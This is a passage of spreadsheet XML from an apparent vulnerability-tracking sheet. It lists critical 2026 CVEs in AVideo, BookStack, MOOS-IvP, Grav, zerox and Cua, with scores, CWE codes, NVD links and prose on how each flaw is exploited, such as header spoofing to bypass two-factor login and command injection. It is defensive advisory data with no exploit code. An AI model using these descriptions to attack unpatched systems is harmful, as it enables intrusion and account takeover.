          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R149"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S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84479</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo (current e01e41ecc and earlier) makes three login-time security controls depend solely on the client-supplied User-Agent header. The isAVideoEncoder()/isAVideoMobileApp() checks match HTTP_USER_AGENT against a hardcoded literal ("AVideoEncoder"/"AVideoMobileApp") with no IP check or shared secret. An attacker who submits valid credentials and sets User-Agent: AVideoEncoder bypasses two-factor authentication, skips brute-force captcha escalation, and avoids being recorded in the login/device audit history. No patch is available at the time of publication.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84479</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84480</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate password recovery token expiration in userRecoverPassSave.json.php, allowing attackers to use expired tokens to reset account passwords indefinitely. Attackers who obtain a recovery token can use it at any time to change the target account's password and gain full account access.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84480</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84695</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>BookStack before 26.05.4 contains a stored cross-site scripting vulnerability in the drawing upload endpoint that accepts unvalidated base64 content and stores it without content inspection. Attackers with editor permissions can upload SVG files containing scripts that execute in administrator browsers when accessed through the image gallery API without content-type validation or CSP headers.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84695</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85146</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SSH service account credentials and passwords for the SmartIT Agent directly from the application source code.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85146</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85148</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can exploit a fixed password to remotely access user hosts.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85148</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85154</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains an authentication failure vulnerability where the video_id_hash credential is a non-expiring, non-revocable bearer token that grants full administrator session access to the video owner's account. Attackers who obtain a video_id_hash can replay it indefinitely to authenticate as the video owner with full privileges, and the credential remains valid even after the owner changes their password.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85154</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85424</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 lacks authentication in the wire protocol, allowing unauthenticated clients to connect with full publish, subscribe, and database clear privileges. Attackers can bypass the compile-time protocol string check and connect with arbitrary client names to execute privileged operations including DB_CLEAR which resets all variables and clears client mail queues.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85424</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85425</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP iSay through 24.8.1 contains a remote code execution vulnerability in the SAY_MOOS variable handler that passes unsanitized text to a shell command. Attackers can publish SAY_MOOS messages containing backticks or command substitution syntax to execute arbitrary commands as the iSay process user.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85425</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85426</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uMemWatch through 24.8.1 constructs shell commands from attacker-chosen MOOS client names without sanitization. Attackers can inject shell metacharacters into client names to execute arbitrary commands as the uMemWatch process user through unquoted redirection targets in system calls.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85426</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85434</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to verify node ping authenticity before creating outbound bridge routes. Attackers can publish NODE_BROKER_PING messages with crafted HostRecord data to redirect bridged variables to attacker-controlled addresses.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85434</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85435</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP u</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85435</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85437</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains multiple buffer overflow vulnerabilities in IvP function string decoders that trust attacker-controlled length fields without validation. Attackers can craft malicious encoded strings with mismatched declared and actual field lengths to overflow heap and stack buffers, potentially achieving remote code execution through MOOS variables or alog files.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85437</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85440</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a pre-authentication heap overflow vulnerability in MOOSCommPkt packet handling that allows remote attackers to write arbitrary data by declaring a negative packet length. Attackers can exploit the signed integer check in InflateTo() and negative size conversion in recv() to overflow a four-byte heap buffer during the HandShake phase before authentication.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85440</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85602</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>The Grav Form plugin (getgrav/grav-plugin-form) versions 8.0.6 through 9.1.19 select the reCAPTCHA version to validate based solely on which response field key is present in the submitted payload. On a site configured for reCAPTCHA v3, an anonymous attacker can place their v3 token under the v2 field name (g-recaptcha-response instead of token), causing validation to use the v2 branch, which never applies the score threshold or verifies the expected action. This results in a complete bypass of reCAPTCHA v3 bot protection. The issue is fixed in version 9.1.20.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85602</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85672</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>zerox 1.1.20 contains an OS command injection vulnerability in the file download mechanism where the temporary file extension derived from document URLs is interpolated unsanitized into shell commands executed by poppler utilities. Attackers can craft document URLs with malicious file extensions containing command substitution syntax to execute arbitrary OS commands before document processing occurs.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85672</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86121</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>Cua computer-server versions before 0.3.42 skip authentication when the CONTAINER_NAME environment variable is unset and bind to all interfaces by default, allowing unauthenticated attackers to execute arbitrary commands. Attackers can reach TCP port 8000 to run shell commands via the run_command endpoint, read and write arbitrary files through file operation endpoints, and access interactive PTY shells without authentication.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86121</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86190</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
